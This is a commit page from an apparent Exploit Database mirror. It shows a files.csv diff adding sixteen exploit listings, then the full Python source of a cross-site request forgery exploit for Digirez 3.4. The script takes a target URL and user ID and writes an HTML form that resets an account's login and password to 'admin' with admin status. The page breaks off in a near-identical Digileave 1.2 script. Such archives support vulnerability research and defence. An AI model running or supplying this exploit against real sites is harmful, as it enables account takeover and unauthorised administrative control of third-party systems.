bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-09-19

Browse source 
16 new exploits

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)
Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (1)

Cam2pc 4.6.2 - BMP Image Processing Integer Overflow
Cam2pc 4.6.2 - '.BMP' Image Processing Integer Overflow
Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering Unspecified Buffer Overflow
Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering CMP Fencepost Denial of Service
Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Unspecified Buffer Overflow
Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering CMP Fencepost Denial of Service

Apple QuickTime 6.4/6.5/7.0.x - PictureViewer JPEG/PICT File Buffer Overflow
Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow

Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service
Tony Cook Imager 0.4x - '.JPEG' / '.TGA' Images Denial of Service

Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure
Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)
Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure

Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption
Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption

XV 3.x - BMP Parsing Local Buffer Overflow
XV 3.x - '.BMP' Parsing Local Buffer Overflow

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2)
Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)

GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized JPEG Image Access
GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized '.JPEG' Image Access

Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload (Metasploit)
Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)

XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution
XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution

Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection
Digirez 3.4 - Cross-Site Request Forgery (Update Admin)
Digileave 1.2 - Cross-Site Request Forgery (Update Admin)
DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass
iBall ADSL2+ Home Router - Authentication Bypass
Apache - HTTP OPTIONS Memory Leak
This commit is contained in:
Offensive Security 2017-09-19 05:01:33 +00:00
parent 4dbf77e268
commit ef4c288da7
22 changed files with 1907 additions and 72 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

41
files.csv
View file

@ -284,7 +284,7 @@ id,file,description,date,author,platform,type,port
1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0
1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0
1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point - Fragmented UDP Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0
1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0
1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0
1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0
@ -3261,7 +3261,7 @@ id,file,description,date,author,platform,type,port
24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos,0
24738,platforms/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,windows,dos,0
24741,platforms/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,windows,dos,0
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - '.BMP' Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0
24747,platforms/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
24755,platforms/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
24756,platforms/linux/dos/24756.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0
@ -3401,8 +3401,8 @@ id,file,description,date,author,platform,type,port
25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos,0
25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0
25974,platforms/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0
25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering Unspecified Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos,0
25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",windows,dos,0
25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Unspecified Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos,0
25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",windows,dos,0
26005,platforms/windows/dos/26005.pl,"Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow",2005-07-19,kcope,windows,dos,0
26010,platforms/windows/dos/26010.py,"Quick TFTP Server Pro 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0
26076,platforms/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 < 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,hardware,dos,0
@ -3486,7 +3486,7 @@ id,file,description,date,author,platform,type,port
27050,platforms/windows/dos/27050.txt,"Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0
27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer JPEG/PICT File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0
27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos,0
27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos,0
@ -3528,7 +3528,7 @@ id,file,description,date,author,platform,type,port
27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0
27553,platforms/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0
27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0
27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - '.JPEG' / '.TGA' Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0
27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0
27639,platforms/multiple/dos/27639.txt,"W3C Amaya 9.4 - textarea rows Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0
27640,platforms/multiple/dos/27640.txt,"W3C Amaya 9.4 - legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0
@ -5444,6 +5444,7 @@ id,file,description,date,author,platform,type,port
41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
42223,platforms/windows/dos/42223.cpp,"Microsoft Windows - 'win32k!NtGdiExtGetObjectW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos,0
42750,platforms/windows/dos/42750.cpp,"Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
41916,platforms/windows/dos/41916.py,"PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)",2017-04-25,Muhann4d,windows,dos,0
42459,platforms/windows/dos/42459.html,"Microsoft Edge 38.14393.1066.0 - 'CInputDateTimeScrollerElement::_SelectValueInternal' Out-of-Bounds Read",2017-08-16,"Google Security Research",windows,dos,0
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
@ -5669,6 +5670,14 @@ id,file,description,date,author,platform,type,port
42602,platforms/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",multiple,dos,0
42652,platforms/linux/dos/42652.txt,"tcprewrite - Heap-Based Buffer Overflow",2017-09-11,FarazPajohan,linux,dos,0
42666,platforms/multiple/dos/42666.txt,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization",2017-09-12,"Google Security Research",multiple,dos,0
42747,platforms/windows/dos/42747.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0
42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8322,7 +8331,7 @@ id,file,description,date,author,platform,type,port
26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local,0
28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0
26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player - '.LST' Buffer Overflow (Metasploit)",2013-07-03,Metasploit,windows,local,0
26703,platforms/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption",2013-07-08,feliam,windows,local,0
26703,platforms/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,windows,local,0
26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,windows,local,0
26709,platforms/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 (x86) - Privilege Escalation",2013-07-09,"Larry W. Cashdollar",lin_x86,local,0
26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0
@ -9414,7 +9423,7 @@ id,file,description,date,author,platform,type,port
399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873
400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote,0
404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
405,platforms/linux/remote/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0
@ -9666,7 +9675,7 @@ id,file,description,date,author,platform,type,port
1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0
1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532
1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",linux,remote,1589
1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2)",2006-02-16,redsand,windows,remote,0
1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)",2006-02-16,redsand,windows,remote,0
1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0
1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0
1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0
@ -13777,7 +13786,7 @@ id,file,description,date,author,platform,type,port
25625,platforms/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2)",2005-05-11,K-sPecial,unix,remote,0
25626,platforms/osx/remote/25626.c,"4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow",2005-05-06,"Braden Thomas",osx,remote,0
25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload",2005-05-06,tjomi4,php,remote,0
25643,platforms/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized JPEG Image Access",2005-05-10,"Tirath Rai",windows,remote,0
25643,platforms/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized '.JPEG' Image Access",2005-05-10,"Tirath Rai",windows,remote,0
25646,platforms/windows/remote/25646.txt,"MyServer 0.8 - Cross-Site Scripting",2005-05-10,dr_insane,windows,remote,0
25648,platforms/cgi/remote/25648.txt,"neteyes nexusway border gateway - Multiple Vulnerabilities",2005-05-11,pokley,cgi,remote,0
25652,platforms/windows/remote/25652.txt,"APG Technology ClassMaster - Unauthorized Folder Access",2005-05-12,"Alex Garrett",windows,remote,0
@ -15369,7 +15378,7 @@ id,file,description,date,author,platform,type,port
38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution (Metasploit)",2015-09-29,Metasploit,windows,remote,8400
38356,platforms/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,multiple,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload (Metasploit)",2015-10-05,Metasploit,windows,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)",2015-10-05,Metasploit,windows,remote,0
38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0
38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
38384,platforms/windows/remote/38384.txt,"Avast! AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
@ -21104,7 +21113,7 @@ id,file,description,date,author,platform,type,port
7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,php,webapps,0
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,php,webapps,0
7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
@ -38196,7 +38205,7 @@ id,file,description,date,author,platform,type,port
41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5/3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
41953,platforms/php/webapps/41953.md,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0
@ -38514,3 +38523,9 @@ id,file,description,date,author,platform,type,port
42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0
42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
42736,platforms/asp/webapps/42736.py,"Digirez 3.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0
42737,platforms/asp/webapps/42737.py,"Digileave 1.2 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0
42738,platforms/asp/webapps/42738.py,"DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0
42739,platforms/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",hardware,webapps,0
42740,platforms/hardware/webapps/42740.txt,"iBall ADSL2+ Home Router - Authentication Bypass",2017-09-18,"Gem George",hardware,webapps,0
42745,platforms/linux/webapps/42745.py,"Apache - HTTP OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0

Can't render this file because it is too large.

213
platforms/asp/webapps/42736.py Executable file
View file

@ -0,0 +1,213 @@
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/index.asp
# Demo: http://www.digiappz.com/room/index.asp
# Version: 3.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digirez 3.4 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/room: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8565): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user" >
<table align=center border=0>
<tr>
<td valign="middle">
<table align=center border=0>
<tr>
<td align=center bgcolor="white">
<table border=0 width=400 cellpadding=2 cellspacing=1>
<tr>
<td align=left colspan=2 bgcolor="cream">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td width=150>
<font>Choose Login*</font>
</td>
<td>
<INPUT type="text" name="login" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Choose Password*</font>
</td>
<td>
<INPUT type="text" name="password" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>First Name*</font>
</td>
<td>
<INPUT type="text" name="first_name" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Last Name*</font>
</td>
<td>
<INPUT type="text" name="last_name" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Email*</font>
</td>
<td>
<INPUT type="text" name="email" size="30"value="admin@admin.com" onBlur="emailvalid(this);">
</td>
</tr>
<tr>
<td>
<font>Address 1</font>
</td>
<td>
<INPUT type="text" name="address1" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Address 2</font>
</td>
<td>
<INPUT type="text" name="address2" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>City / Town</font>
</td>
<td>
<INPUT type="text" name="city" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>ZIP / Postcode</font>
</td>
<td>
<INPUT type="text" name="postcode" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>State / County</font>
</td>
<td>
<INPUT type="text" name="county" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Country</font>
</td>
<td>
<select name="country">
<option value="1" selected> Turkey
</select>
</td>
</tr>
<tr>
<td>
<font>Phone Number
<td>
<INPUT type="text" name="phone" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Fax</font>
</td>
<td>
<INPUT type="text" name="fax" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Status</font>
</td>
<td>
<select name="status">
<option value="1"> User</option>
<option value="2" selected> Admin</option>
</select>
</td>
</tr>
<tr>
<td colspan=2 align=center>
<input type="hidden" name="id" value="%s">
<input type="submit" value="Update" onclick="return check()">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()

135
platforms/asp/webapps/42737.py Executable file
View file

@ -0,0 +1,135 @@
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digileave.asp?id=1
# Demo: http://www.digiappz.com/digileave/login.asp
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
